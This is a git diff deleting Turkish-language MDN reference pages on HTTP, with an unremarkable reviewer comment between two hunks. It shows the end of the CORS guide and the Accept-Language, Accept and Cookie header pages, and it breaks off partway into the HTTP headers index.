- - -HTTP/1.1 200 OK -Date: Mon, 01 Dec 2008 01:15:40 GMT -Server: Apache/2.0.61 (Unix) -Access-Control-Allow-Origin: http://foo.example -Vary: Accept-Encoding, Origin 
-Content-Encoding: gzip -Content-Length: 235 -Keep-Alive: timeout=2, max=99 -Connection: Keep-Alive -Content-Type: text/plain - -[Some GZIP'd payload] -</pre> - -<p>Lines 1 - 12 above represent the preflight request with the {{HTTPMethod("OPTIONS")}} method. The browser determines that it needs to send this based on the request parameters that the JavaScript code snippet above was using, so that the server can respond whether it is acceptable to send the request with the actual request parameters. OPTIONS is an HTTP/1.1 method that is used to determine further information from servers, and is a {{Glossary("safe")}} method, meaning that it can't be used to change the resource. Note that along with the OPTIONS request, two other request headers are sent (lines 10 and 11 respectively):</p> - -<pre class="brush: none">Access-Control-Request-Method: POST -Access-Control-Request-Headers: X-PINGOTHER, Content-Type -</pre> - -<p>The {{HTTPHeader("Access-Control-Request-Method")}} header notifies the server as part of a preflight request that when the actual request is sent, it will be sent with a <code>POST</code> request method. The {{HTTPHeader("Access-Control-Request-Headers")}} header notifies the server that when the actual request is sent, it will be sent with a <code>X-PINGOTHER</code> and <code>Content-Type</code> custom headers. The server now has an opportunity to determine whether it wishes to accept a request under these circumstances.</p> - -<p>Lines 14 - 26 above are the response that the server sends back indicating that the request method (<code>POST</code>) and request headers (<code>X-PINGOTHER</code>) are acceptable. 
In particular, let's look at lines 17-20:</p> - -<pre class="brush: none">Access-Control-Allow-Origin: http://foo.example -Access-Control-Allow-Methods: POST, GET -Access-Control-Allow-Headers: X-PINGOTHER, Content-Type -Access-Control-Max-Age: 86400</pre> - -<p>The server responds with <code>Access-Control-Allow-Methods</code> and says that <code>POST</code> and <code>GET</code> are viable methods to query the resource in question. Note that this header is similar to the {{HTTPHeader("Allow")}} response header, but used strictly within the context of access control.</p> - -<p>The server also sends <code>Access-Control-Allow-Headers</code> with a value of "<code>X-PINGOTHER, Content-Type</code>", confirming that these are permitted headers to be used with the actual request. Like <code>Access-Control-Allow-Methods</code>, <code>Access-Control-Allow-Headers</code> is a comma separated list of acceptable headers.</p> - -<p>Finally, {{HTTPHeader("Access-Control-Max-Age")}} gives the value in seconds for how long the response to the preflight request can be cached for without sending another preflight request. In this case, 86400 seconds is 24 hours. Note that each browser has a <a href="/en-US/docs/Web/HTTP/Headers/Access-Control-Max-Age">maximum internal value</a> that takes precedence when the <code>Access-Control-Max-Age</code> is greater.</p> - -<h4 id="Preflighted_requests_and_redirects">Preflighted requests and redirects</h4> - -<p>Not all browsers currently support following redirects after a preflighted request. 
If a redirect occurs after a preflighted request, some browsers currently will report an error message such as the following.</p> - -<blockquote> -<p>The request was redirected to 'https://example.com/foo', which is disallowed for cross-origin requests that require preflight</p> -</blockquote> - -<blockquote> -<p>Request requires preflight, which is disallowed to follow cross-origin redirect</p> -</blockquote> - -<p>The CORS protocol originally required that behavior but <a href="https://github.com/whatwg/fetch/commit/0d9a4db8bc02251cc9e391543bb3c1322fb882f2">was subsequently changed to no longer require it</a>. However, not all browsers have implemented the change, and so still exhibit the behavior that was originally required.</p> - -<p>So until all browsers catch up with the spec, you may be able to work around this limitation by doing one or both of the following:</p> - -<ul> - <li>change the server-side behavior to avoid the preflight and/or to avoid the redirect—if you have control over the server the request is being made to</li> - <li>change the request such that it is a <a href="#Simple_requests">simple request</a> that doesn’t cause a preflight</li> -</ul> - -<p>But if it’s not possible to make those changes, then another way that may be possible is to this:</p> - -<ol> - <li>Make a <a href="#Simple_requests">simple request</a> (using {{domxref("Response.url")}} for the Fetch API, or {{domxref("XMLHttpRequest.responseURL")}}) to determine what URL the real preflighted request would end up at.</li> - <li>Make another request (the “real” request) using the URL you obtained from <code>Response.url</code> or <code>XMLHttpRequest.responseURL</code> in the first step.</li> -</ol> - -<p>However, if the request is one that triggers a preflight due to the presence of the <code>Authorization</code> header in the request, you won’t be able to work around the limitation using the steps above. 
And you won’t be able to work around it at all unless you have control over the server the request is being made to.</p> - -<h3 id="Requests_with_credentials">Requests with credentials</h3> - -<p>The most interesting capability exposed by both {{domxref("XMLHttpRequest")}} or <a href="/en-US/docs/Web/API/Fetch_API">Fetch</a> and CORS is the ability to make "credentialed" requests that are aware of <a href="/en-US/docs/Web/HTTP/Cookies">HTTP cookies</a> and HTTP Authentication information. By default, in cross-site <code>XMLHttpRequest</code> or <a href="/en-US/docs/Web/API/Fetch_API">Fetch</a> invocations, browsers will <strong>not</strong> send credentials. A specific flag has to be set on the <code>XMLHttpRequest</code> object or the {{domxref("Request")}} constructor when it is invoked.</p> - -<p>In this example, content originally loaded from <code class="plain">http://foo.example</code> makes a simple GET request to a resource on <code class="plain">http://bar.other</code> which sets Cookies. Content on foo.example might contain JavaScript like this:</p> - -<pre class="brush: js" id="line1">const invocation = new XMLHttpRequest(); -const url = 'http://bar.other/resources/credentialed-content/'; - -function callOtherDomain(){ - if(invocation) { - invocation.open('GET', url, true); - invocation.withCredentials = true; - invocation.onreadystatechange = handler; - invocation.send(); - } -}</pre> - -<p>Line 7 shows the flag on {{domxref("XMLHttpRequest")}} that has to be set in order to make the invocation with Cookies, namely the <code>withCredentials</code> boolean value. By default, the invocation is made without Cookies. 
Since this is a simple <code>GET</code> request, it is not preflighted, but the browser will <strong>reject</strong> any response that does not have the {{HTTPHeader("Access-Control-Allow-Credentials")}}<code>: true</code> header, and <strong>not</strong> make the response available to the invoking web content.</p> - -<p><img alt="" src="https://mdn.mozillademos.org/files/14291/cred-req.png" style="height: 223px; width: 521px;"></p> - -<p>Here is a sample exchange between client and server:</p> - -<pre class="brush: none">GET /resources/access-control-with-credentials/ HTTP/1.1 -Host: bar.other -User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20081130 Minefield/3.1b3pre -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-us,en;q=0.5 -Accept-Encoding: gzip,deflate -Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 -Connection: keep-alive -Referer: http://foo.example/examples/credential.html -Origin: http://foo.example -Cookie: pageAccess=2 - - -HTTP/1.1 200 OK -Date: Mon, 01 Dec 2008 01:34:52 GMT -Server: Apache/2.0.61 (Unix) PHP/4.4.7 mod_ssl/2.0.61 OpenSSL/0.9.7e mod_fastcgi/2.4.2 DAV/2 SVN/1.4.2 -X-Powered-By: PHP/5.2.6 -Access-Control-Allow-Origin: http://foo.example -Access-Control-Allow-Credentials: true -Cache-Control: no-cache -Pragma: no-cache -Set-Cookie: pageAccess=3; expires=Wed, 31-Dec-2008 01:34:53 GMT -Vary: Accept-Encoding, Origin -Content-Encoding: gzip -Content-Length: 106 -Keep-Alive: timeout=2, max=100 -Connection: Keep-Alive -Content-Type: text/plain - - -[text/plain payload] -</pre> - -<p>Although line 11 contains the Cookie destined for the content on <code class="plain">http://bar.other</code>, if bar.other did not respond with an {{HTTPHeader("Access-Control-Allow-Credentials")}}<code>: true</code> (line 19) the response would be ignored and not made available to web content.</p> - -<h4 id="Credentialed_requests_and_wildcards">Credentialed requests and 
wildcards</h4> - -<p>When responding to a credentialed request, the server <strong>must</strong> specify an origin in the value of the <code>Access-Control-Allow-Origin</code> header, instead of specifying the "<code>*</code>" wildcard.</p> - -<p>Because the request headers in the above example include a <code>Cookie</code> header, the request would fail if the value of the <code>Access-Control-Allow-Origin</code> header were "*". But it does not fail: Because the value of the <code>Access-Control-Allow-Origin</code> header is "<code class="plain">http://foo.example</code>" (an actual origin) rather than the "<code>*</code>" wildcard, the credential-cognizant content is returned to the invoking web content.</p> - -<p>Note that the <code>Set-Cookie</code> response header in the example above also sets a further cookie. In case of failure, an exception—depending on the API used—is raised.</p> - -<h4 id="Third-party_cookies">Third-party cookies</h4> - -<p>Note that cookies set in CORS responses are subject to normal third-party cookie policies. In the example above, the page is loaded from <code>foo.example</code>, but the cookie on line 22 is sent by <code>bar.other</code>, and would thus not be saved if the user has configured their browser to reject all third-party cookies.</p> - -<h2 id="The_HTTP_response_headers">The HTTP response headers</h2> - -<p>This section lists the HTTP response headers that servers send back for access control requests as defined by the Cross-Origin Resource Sharing specification. 
The previous section gives an overview of these in action.</p> - -<h3 id="Access-Control-Allow-Origin">Access-Control-Allow-Origin</h3> - -<p>A returned resource may have one {{HTTPHeader("Access-Control-Allow-Origin")}} header, with the following syntax:</p> - -<pre class="brush: none">Access-Control-Allow-Origin: <origin> | * -</pre> - -<p><code>Access-Control-Allow-Origin</code> specifies either a single origin, which tells browsers to allow that origin to access the resource; or else — for requests <strong>without</strong> credentials — the "<code>*</code>" wildcard, to tell browsers to allow any origin to access the resource.</p> - -<p>For example, to allow code from the origin <code>http://mozilla.org</code> to access the resource, you can specify:</p> - -<pre class="brush: none">Access-Control-Allow-Origin: http://mozilla.org</pre> - -<p>If the server specifies a single origin rather than the "<code>*</code>" wildcard, then the server should also include <code>Origin</code> in the {{HTTPHeader("Vary")}} response header — to indicate to clients that server responses will differ based on the value of the {{HTTPHeader("Origin")}} request header.</p> - -<h3 id="Access-Control-Expose-Headers">Access-Control-Expose-Headers</h3> - -<p>The {{HTTPHeader("Access-Control-Expose-Headers")}} header lets a server whitelist headers that browsers are allowed to access. For example:</p> - -<pre class="brush: none">Access-Control-Expose-Headers: X-My-Custom-Header, X-Another-Custom-Header -</pre> - -<p>This allows the <code>X-My-Custom-Header</code> and <code>X-Another-Custom-Header</code> headers to be exposed to the browser.</p> - -<h3 id="Access-Control-Max-Age">Access-Control-Max-Age</h3> - -<p>The {{HTTPHeader("Access-Control-Max-Age")}} header indicates how long the results of a preflight request can be cached. 
For an example of a preflight request, see the above examples.</p> - -<pre class="brush: none">Access-Control-Max-Age: <delta-seconds> -</pre> - -<p>The <code>delta-seconds</code> parameter indicates the number of seconds the results can be cached.</p> - -<h3 id="Access-Control-Allow-Credentials">Access-Control-Allow-Credentials</h3> - -<p>The {{HTTPHeader("Access-Control-Allow-Credentials")}} header Indicates whether or not the response to the request can be exposed when the <code>credentials</code> flag is true. When used as part of a response to a preflight request, this indicates whether or not the actual request can be made using credentials. Note that simple <code>GET</code> requests are not preflighted, and so if a request is made for a resource with credentials, if this header is not returned with the resource, the response is ignored by the browser and not returned to web content.</p> - -<pre class="brush: none">Access-Control-Allow-Credentials: true -</pre> - -<p><a class="internal" href="#Requests_with_credentials">Credentialed requests</a> are discussed above.</p> - -<h3 id="Access-Control-Allow-Methods">Access-Control-Allow-Methods</h3> - -<p>The {{HTTPHeader("Access-Control-Allow-Methods")}} header specifies the method or methods allowed when accessing the resource. This is used in response to a preflight request. 
The conditions under which a request is preflighted are discussed above.</p> - -<pre class="brush: none">Access-Control-Allow-Methods: <method>[, <method>]* -</pre> - -<p>An example of a <a class="internal" href="#Preflighted_requests">preflight request is given above</a>, including an example which sends this header to the browser.</p> - -<h3 id="Access-Control-Allow-Headers">Access-Control-Allow-Headers</h3> - -<p>The {{HTTPHeader("Access-Control-Allow-Headers")}} header is used in response to a <a class="internal" href="#Preflighted_requests">preflight request</a> to indicate which HTTP headers can be used when making the actual request.</p> - -<pre class="brush: none">Access-Control-Allow-Headers: <field-name>[, <field-name>]* -</pre> - -<h2 id="The_HTTP_request_headers">The HTTP request headers</h2> - -<p>This section lists headers that clients may use when issuing HTTP requests in order to make use of the cross-origin sharing feature. Note that these headers are set for you when making invocations to servers. Developers using cross-site {{domxref("XMLHttpRequest")}} capability do not have to set any cross-origin sharing request headers programmatically.</p> - -<h3 id="Origin">Origin</h3> - -<p>The {{HTTPHeader("Origin")}} header indicates the origin of the cross-site access request or preflight request.</p> - -<pre class="brush: none">Origin: <origin> -</pre> - -<p>The origin is a URI indicating the server from which the request initiated. 
It does not include any path information, but only the server name.</p> - -<div class="note"><strong>Note:</strong> The <code>origin</code> can be the empty string; this is useful, for example, if the source is a <code>data</code> URL.</div> - -<p>Note that in any access control request, the {{HTTPHeader("Origin")}} header is <strong>always</strong> sent.</p> - -<h3 id="Access-Control-Request-Method">Access-Control-Request-Method</h3> - -<p>The {{HTTPHeader("Access-Control-Request-Method")}} is used when issuing a preflight request to let the server know what HTTP method will be used when the actual request is made.</p> - -<pre class="brush: none">Access-Control-Request-Method: <method> -</pre> - -<p>Examples of this usage can be <a class="internal" href="#Preflighted_requests">found above.</a></p> - -<h3 id="Access-Control-Request-Headers">Access-Control-Request-Headers</h3> - -<p>The {{HTTPHeader("Access-Control-Request-Headers")}} header is used when issuing a preflight request to let the server know what HTTP headers will be used when the actual request is made.</p> - -<pre class="brush: none">Access-Control-Request-Headers: <field-name>[, <field-name>]* -</pre> - -<p>Examples of this usage can be <a class="internal" href="#Preflighted_requests">found above</a>.</p> - -<h2 id="Specifications">Specifications</h2> - -<table class="standard-table"> - <tbody> - <tr> - <th scope="col">Specification</th> - <th scope="col">Status</th> - <th scope="col">Comment</th> - </tr> - <tr> - <td>{{SpecName('Fetch', '#cors-protocol', 'CORS')}}</td> - <td>{{Spec2('Fetch')}}</td> - <td>New definition; supplants <a href="https://www.w3.org/TR/cors/">W3C CORS</a> specification.</td> - </tr> - </tbody> -</table> - -<h2 id="Browser_compatibility">Browser compatibility</h2> - -<p class="hidden">The compatibility table in this page is generated from structured data. 
If you'd like to contribute to the data, please check out <a href="https://github.com/mdn/browser-compat-data">https://github.com/mdn/browser-compat-data</a> and send us a pull request.</p> - -<p>{{Compat("http.headers.Access-Control-Allow-Origin")}}</p> - -<h3 id="Compatibility_notes">Compatibility notes</h3> - -<ul> - <li>Internet Explorer 8 and 9 expose CORS via the <code>XDomainRequest</code> object, but have a full implementation in IE 10.</li> - <li>While Firefox 3.5 introduced support for cross-site <code>XMLHttpRequests</code> and Web Fonts, certain requests were limited until later versions. Specifically, Firefox 7 introduced the ability for cross-site HTTP requests for WebGL Textures, and Firefox 9 added support for Images drawn on a canvas using <code>drawImage()</code>.</li> -</ul> - -<h2 id="See_also">See also</h2> - -<ul> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors">CORS errors</a></li> - <li><a href="https://enable-cors.org/server.html">Enable CORS: I want to add CORS support to my server</a></li> - <li>{{domxref("XMLHttpRequest")}}</li> - <li><a href="/en-US/docs/Web/API/Fetch_API">Fetch API</a></li> - <li><a class="external" href="http://www.kendoui.com/blogs/teamblog/posts/11-10-03/using_cors_with_all_modern_browsers.aspx">Using CORS with All (Modern) Browsers</a></li> - <li><a href="http://www.html5rocks.com/en/tutorials/cors/">Using CORS - HTML5 Rocks</a> - <ul> - </ul> - </li> - <li><a class="external" href="https://arunranga.com/examples/access-control/">Code Samples Showing <code>XMLHttpRequest</code> and Cross-Origin Resource Sharing</a></li> - <li><a href="https://github.com/jackblackevo/cors-jsonp-sample">Client-Side & Server-Side (Java) sample for Cross-Origin Resource Sharing (CORS)</a></li> - <li><a class="internal" href="/en-US/docs/Web/HTTP/Server-Side_Access_Control">Cross-Origin Resource Sharing From a Server-Side Perspective (PHP, etc.)</a></li> - <li><a 
href="https://stackoverflow.com/questions/43871637/no-access-control-allow-origin-header-is-present-on-the-requested-resource-whe/43881141#43881141">Stack Overflow answer with “how to” info for dealing with common problems</a>: - <ul> - <li>How to avoid the CORS preflight</li> - <li>How to use a CORS proxy to get around <em>“No Access-Control-Allow-Origin header”</em></li> - <li>How to fix <em>“Access-Control-Allow-Origin header must not be the wildcard”</em></li> - </ul> - </li> -</ul> - -<div>{{HTTPSidebar}}</div> diff --git a/files/tr/web/http/headers/accept-language/index.html b/files/tr/web/http/headers/accept-language/index.html deleted file mode 100644 index fb3fe1dbe4..0000000000 --- a/files/tr/web/http/headers/accept-language/index.html +++ /dev/null 
@@ -1,97 +0,0 @@ ---- -title: Accept-Language -slug: Web/HTTP/Headers/Accept-Language -tags: - - HTTP Başlığı - - İçerik görüşmesi -translation_of: Web/HTTP/Headers/Accept-Language ---- -<div>{{HTTPSidebar}}</div> - -<p><strong><code>Accept-Language</code></strong> HTTP başlığı, istemcinin hangi dilleri anlayabildiğini ve hangi dil türünün tercih edildiğini bildirir. (Burada dil derken programlama dili değil, İngilizce gibi doğal dillerden bahsediyoruz.) Sunucu i<a href="/tr/docs/Web/HTTP/Content_negotiation">çerik görüşmesi</a> kullanarak bu önerilerden birini seçip kullanır ve {{HTTPHeader("Content-Language")}} yanıt başlığı aracılığıyla istemciye seçtiği dili bildirir. Tarayıcılar kullanıcı arayüzü diline bakarak bu başlığa uygun değerleri verir ve kullanıcı bunu değiştirebilse de bu pek sık olmaz (ve parmak izine neden olduğundan hoş karşılanmaz).</p> - -<p>Bu başlık, sunucunun kullanıcı tarafından bilinçli olarak belirtilmiş bir URL gibi herhangi bir yoldan dil berlirleme imkanı olmadığında kullanması için verilen bir ipucudur. Sunucunun asla bilinçli bir seçimi geçersiz kılmaması önerilmektedir. <code>Accept-Language</code> içeriği genellikle kullanıcının kontrolünde değildir (örneğin seyahat ederken başka bir ülkede bir internet kafeyi kullanmak gibi); kullanıcı kendi kullanıcı arayüzünün dili dışında bir dilde de sayfayı görüntülemek isteyebilir.</p> - -<p>Eğer sunucu eşleşen hiçbir dilde hizmet veremiyorsa, teoride bir {{HTTPStatus("406")}} (Kabul edilemez) hata kodunu döndürebilir. 
Ancak, daha iyi bir kullanıcı deneyimi sağlanması için bu nadiren yapılır ve bu durumda genellikle <code>Accept-Language</code> başlığı görmezden gelinir.</p> - -<table class="properties"> - <tbody> - <tr> - <th scope="row">Başlık türü</th> - <td>{{Glossary("Request header")}}</td> - </tr> - <tr> - <th scope="row">{{Glossary("Forbidden header name")}}</th> - <td>hayır</td> - </tr> - <tr> - <th scope="row">{{Glossary("Simple header", "CORS-safelisted request-header")}}</th> - <td>evet</td> - </tr> - </tbody> -</table> - -<h2 id="Sözdizimi">Sözdizimi</h2> - -<pre class="syntaxbox">Accept-Language: <language> -Accept-Language: * - -// {{glossary("quality values", "quality value")}} sözdizimi ile ağırlıklandırılmış birden fazla dil var: -Accept-Language: fr-CH, fr;q=0.9, en;q=0.8, de;q=0.7, *;q=0.5</pre> - -<h2 id="Direktifler">Direktifler</h2> - -<dl> - <dt><code><language></code></dt> - <dd> - <p>Bir dil etiketi (bazen "yerel ayar kimliği" olarak da adlandırılır). Bu direktif 2-3 harften oluşan ve dili demsil eden bir temel dil etiketidir, isteğe bağlı olarak ardından <code>'-'</code> ile ayrılan ek alt etiketler gelebilir. En sık kullanılan ek bilgi ülke veya bölge varyantı (<code>'en-US'</code> veya <code>'fr-CA'</code> gibi) ya da kullanılacak alfabe türüdür (<code>'sr-Latn'</code> gibi). 
Yazım türü (<code>'de-DE-1996'</code>) gibi diğer varyantlar genellikle bu başlık kapsamında kullanılmaz.</p> - </dd> - <dt><code>*</code></dt> - <dd>Herhangi bir dil; <code>'*'</code> joker karakter olarak kullanılır.</dd> - <dt><code>;q=</code> (q-faktör ağırlıklandırması)</dt> - <dd>Tercih sırasına göre yerleştirilen herhangi bir değer, <em>ağırlık </em>denilen göreceli bir {{glossary("Quality values", "quality value")}} ile ifade edilir.</dd> -</dl> - -<h2 id="Örnekler">Örnekler</h2> - -<pre>Accept-Language: de - -Accept-Language: de-CH - -Accept-Language: en-US,en;q=0.5 -</pre> - -<h2 id="Özellikler">Özellikler</h2> - -<table class="standard-table"> - <thead> - <tr> - <th scope="col">Özellik</th> - <th scope="col">Başlık</th> - </tr> - </thead> - <tbody> - <tr> - <td>{{RFC("7231", "Accept-Language", "5.3.5")}}</td> - <td>Hypertext Transfer Protocol (HTTP/1.1): Anlambilim ve Bağlam</td> - </tr> - <tr> - <td><a href="https://tools.ietf.org/html/bcp47">BCP 47</a></td> - <td>Dilin Belirlenmesi için Etiketler</td> - </tr> - </tbody> -</table> - -<h2 id="Tarayıcı_uyumluluğu">Tarayıcı uyumluluğu</h2> - -<p class="hidden"><span class="tlid-translation translation" lang="tr">Bu sayfadaki uyumluluk tablosu yapılandırılmış verilerden üretilmiştir. Verilere katkıda bulunmak istiyorsanız, lütfen</span> <a href="https://github.com/mdn/browser-compat-data">https://github.com/mdn/browser-compat-data</a> <span class="tlid-translation translation" lang="tr"> adresini ziyaret edin ve bize bir çekme isteği gönderin.</span></p> - -<p>{{Compat("http.headers.Accept-Language")}}</p> - -<h2 id="Bakınız">Bakınız</h2> - -<ul> - <li>HTTP <a href="/tr/docs/Web/HTTP/Content_negotiation">içerik görüşmesi</a></li> - <li>İçerik görüşmesinin sonucunu içeren başlık: {{HTTPHeader("Content-Language")}}</li> - <li>Diğer benzer başlıklar: {{HTTPHeader("TE")}}, {{HTTPHeader("Accept-Encoding")}}, {{HTTPHeader("Accept-Charset")}}, {{HTTPHeader("Accept")}}</li> -</ul> 
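Review bot: the deletion of files/tr/web/http/headers/accept-language/index.html (hunk @@ -1,97 +0,0 @@) removes a page whose body is fully translated into Turkish, including the syntax, directives, examples and specifications sections, whereas the file deleted immediately before it in this patch is English text stored under files/tr. If the criterion for this cleanup is untranslated or stale content, this file does not obviously meet it, so the reason for removing it should be stated in the commit message. The diffstat shown (limited to files/tr/web/http) has 0 insertions, so no redirect for the slug Web/HTTP/Headers/Accept-Language is visible in this part of the change; please confirm one is added elsewhere so that existing links to this slug under /tr/docs/ still resolve.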
diff --git a/files/tr/web/http/headers/accept/index.html b/files/tr/web/http/headers/accept/index.html deleted file mode 100644 index 85ffcc2b40..0000000000 --- a/files/tr/web/http/headers/accept/index.html +++ /dev/null 
@@ -1,99 +0,0 @@ ---- -title: Accept -slug: Web/HTTP/Headers/Accept -tags: - - HTTP - - HTTP Başlığı - - Referans - - İstek başlığı -translation_of: Web/HTTP/Headers/Accept ---- -<p>{{HTTPSidebar}}</p> - -<p>Accept <strong><code>HTTP</code></strong> başlığı, istemcinin hangi içerik tiplerini(<a href="https://wiki.developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/MIME_types">MIME types</a>) anlayabileceğini sunucuya söyler. Sunucu <a href="https://wiki.developer.mozilla.org/en-US/docs/Web/HTTP/Content_negotiation">content negotiation</a> kullanarak bu tiplerden birini seçer ve istemciye {{HTTPHeader("Content-Type")}} başlığı ile seçimini gönderir. Tarayıcılar bu başlığın belirttiği içerik tipine göre gerekli değerleri ayarlar. CSS, resim, video veya script dosyaları için farklı değerler ayarlanır.</p> - -<table class="properties"> - <tbody> - <tr> - <th scope="row">Başlık türü</th> - <td> - <p>{{Glossary("Request header")}}</p> - </td> - </tr> - <tr> - <th scope="row">{{Glossary("Forbidden header name")}}</th> - <td>hayır</td> - </tr> - <tr> - <th scope="row">{{Glossary("CORS-safelisted request header")}}</th> - <td>Evet ama CORS-güvensiz başlık baytlarını içermemelidir: 0x00-0x1F(0x09 (HT) hariç), <code>"():<>?@[\]{}</code> ve 0x7F(DEL).</td> - </tr> - </tbody> -</table> - -<h2 id="Söz_Dizimi">Söz Dizimi</h2> - -<pre class="syntaxbox notranslate">Accept: <MIME_type>/<MIME_subtype> -Accept: <MIME_type>/* -Accept: */* - -// Çok tipli, <a href="https://developer.mozilla.org/en-US/docs/Glossary/quality_values">ağırlık</a> belirtilebilir söz dizimi: -Accept: text/html, application/xhtml+xml, application/xml;q=0.9, image/webp, */*;q=0.8 -</pre> - -<h2 id="Komutlar">Komutlar</h2> - -<dl> - <dt><code><MIME_type>/<MIME_subtype></code></dt> - <dd>Tek <a href="/en-US/docs/Web/HTTP/Basics_of_HTTP/MIME_types">MIME tip</a>, mesela <code>text/html</code>.</dd> - <dt><code><MIME_type>/*</code></dt> - <dd>Bir MIME tip altında herhangi bir alt tip. 
<code>image/*</code> tipi <code>image/png</code>, <code>image/svg</code>, <code>image/gif</code> tiplerini kapsar.</dd> - <dt><code>*/*</code></dt> - <dd>Herhangi bir MIME tip</dd> - <dt><code>;q=</code> (ağırlık)</dt> - <dd>Sıralamayı belirtmek için <a href="/en-US/docs/Glossary/Quality_values">ağırlık</a> denilen bir değer kullanılabilir.</dd> -</dl> - -<h2 id="Örnekler">Örnekler</h2> - -<pre class="notranslate">Accept: text/html - -Accept: image/* - -// Çoğu tarayıcıda varsayılan olarak gönderilir -Accept: */* - -// Gezinme için varsayılan -Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8 -</pre> - -<h2 id="Şartname">Şartname</h2> - -<table class="standard-table"> - <thead> - <tr> - <th scope="col">Şartname</th> - <th scope="col">İsim</th> - </tr> - </thead> - <tbody> - <tr> - <td>{{RFC("7231", "Accept", "5.3.2")}}</td> - <td>Hypertext Transfer Protocol (HTTP/1.1): Semantics and Context</td> - </tr> - </tbody> -</table> - -<h2 id="Tarayıcı_uyumluluğu">Tarayıcı uyumluluğu</h2> - -<p class="hidden">Uyumluluk tablosu hazır verilerden otomatik olarak oluşturulmuştur. Eğer bu verilere katkı yapmak isterseniz lütfen <a href="https://github.com/mdn/browser-compat-data">https://github.com/mdn/browser-compat-data</a> adresini inceleyin.</p> - -<p>{{Compat("http.headers.Accept")}}</p> - -<h2 id="İlişkili_konular">İlişkili konular</h2> - -<ul> - <li>HTTP <a href="/en-US/docs/Web/HTTP/Content_negotiation">content negotiation</a></li> - <li>Content negotiation sonucunu belirten başlık: {{HTTPHeader("Content-Type")}}</li> - <li>Diğer benzer başlıklar: {{HTTPHeader("TE")}}, {{HTTPHeader("Accept-Encoding")}}, {{HTTPHeader("Accept-Charset")}}, {{HTTPHeader("Accept-Language")}}</li> -</ul> diff --git a/files/tr/web/http/headers/cookie/index.html b/files/tr/web/http/headers/cookie/index.html deleted file mode 100644 index dd0338e648..0000000000 --- a/files/tr/web/http/headers/cookie/index.html +++ /dev/null 
@@ -1,71 +0,0 @@ ---- -title: Çerez -slug: Web/HTTP/Headers/Cookie -tags: - - HTTP - - Çerez -translation_of: Web/HTTP/Headers/Cookie ---- -<div>{{HTTPSidebar}}</div> - -<p><strong><code>Cookie</code></strong><span class="tlid-translation translation" lang="tr"> HTTP istek başlığı, daha önce sunucu tarafından {{HTTPHeader ("Set-Cookie")}} başlığıyla gönderilip tarayıcıda saklanmış olan </span><a href="/tr/docs/Web/HTTP/Cookies">HTTP çerezlerini</a><span class="tlid-translation translation" lang="tr"> içerir.</span></p> - -<p><code>Cookie</code><span class="tlid-translation translation" lang="tr"> başlığı isteğe bağlıdır ve örneğin tarayıcının gizlilik ayarları çerezleri engellediğinde gözardı edilebilir.</span></p> - -<table class="properties"> - <tbody> - <tr> - <th scope="row">Başlık türü</th> - <td>{{Glossary("Request header")}}</td> - </tr> - <tr> - <th scope="row">{{Glossary("Forbidden header name")}}</th> - <td>evet</td> - </tr> - </tbody> -</table> - -<h2 id="Sözdizimi">Sözdizimi</h2> - -<pre class="syntaxbox">Cookie: <cerez-listesi> -Cookie: ad=deger -Cookie: ad=deger; ad2=deger2; ad3=deger3</pre> - -<dl> - <dt><cookie-list></dt> - <dd><code><cookie-adi>=<cookie-degeri></code><span class="tlid-translation translation" lang="tr"> biçimindeki ad ve değer çiftlerinden oluşan bir liste. 
Listedeki çiftler noktalı virgül ve boşlukla </span>(<code>'; '</code>) <span class="tlid-translation translation" lang="tr">ayrılır.</span></dd> -</dl> - -<h2 id="Örnekler">Örnekler</h2> - -<pre>Cookie: PHPSESSID=298zf09hf012fh2; csrftoken=u32t4o3tb3gg43; _gat=1;</pre> - -<h2 id="Specifications">Specifications</h2> - -<table class="standard-table"> - <thead> - <tr> - <th scope="col">Tanım</th> - <th scope="col">Başlık</th> - </tr> - </thead> - <tbody> - <tr> - <td>{{RFC("6265", "Cookie", "5.4")}}</td> - <td>HTTP State Management Mechanism</td> - </tr> - </tbody> -</table> - -<h2 id="Tarayıcı_uyumluluğu">Tarayıcı uyumluluğu</h2> - -<p class="hidden"><span class="tlid-translation translation" lang="tr">Bu sayfadaki uyumluluk tablosu yapılandırılmış verilerden üretilmiştir. Verilere katkıda bulunmak istiyorsanız, lütfen </span> <a href="https://github.com/mdn/browser-compat-data">https://github.com/mdn/browser-compat-data</a><span class="tlid-translation translation" lang="tr"> adresini ziyaret edin ve bize bir çekme isteği gönderin.</span></p> - -<p>{{Compat("http.headers.Cookie")}}</p> - -<h2 id="Bakınız">Bakınız</h2> - -<ul> - <li>{{HTTPHeader("Set-Cookie")}}</li> - <li>{{domxref("Document.cookie")}}</li> -</ul> diff --git a/files/tr/web/http/headers/index.html b/files/tr/web/http/headers/index.html deleted file mode 100644 index e117a7583b..0000000000 --- a/files/tr/web/http/headers/index.html +++ /dev/null 
@@ -1,370 +0,0 @@ ---- -title: HTTP başlıkları -slug: Web/HTTP/Headers -tags: - - HTTP - - Headers - - NeedsTranslation - - Networking - - Reference - - TopicStub -translation_of: Web/HTTP/Headers ---- -<div>{{HTTPSidebar}}</div> - -<p><span class="tlid-translation translation" lang="tr">HTTP başlıkları, istemci ve sunucunun istek veya yanıtla birlikte ek bilgiler iletebilmesini sağlar. Bir istek başlığı, büyük/küçük harfe duyarsız olarak başlığın adı, iki nokta üst üste </span> '<code>:</code>'<span class="tlid-translation translation" lang="tr">, ve ardından değeri (satır sonu karakterleri içermeden) şeklindedir. Değerden önceki boşluk karakterleri dikkate alınmaz.</span></p> - -<p><span class="tlid-translation translation" lang="tr">'X-' öneki kullanılarak çeşitli özel başlıklar eklenebilir, ancak standart olmayan alanların </span><a href="https://tools.ietf.org/html/rfc6648">RFC 6648</a><span class="tlid-translation translation" lang="tr">'de standart hale gelmesinin neden olduğu rahatsızlıklardan dolayı bu uygulama Haziran 2012'de kaldırılmıştır; diğerleri ise asıl içeriği </span><a class="external" href="http://tools.ietf.org/html/rfc4229">RFC 4229</a><span class="tlid-translation translation" lang="tr">'da tanımlanan bir </span><a class="external" href="http://www.iana.org/assignments/message-headers/perm-headers.html">IANA kayıt defteri</a><span class="tlid-translation translation" lang="tr">'nde listelenmiştir. IANA, <a 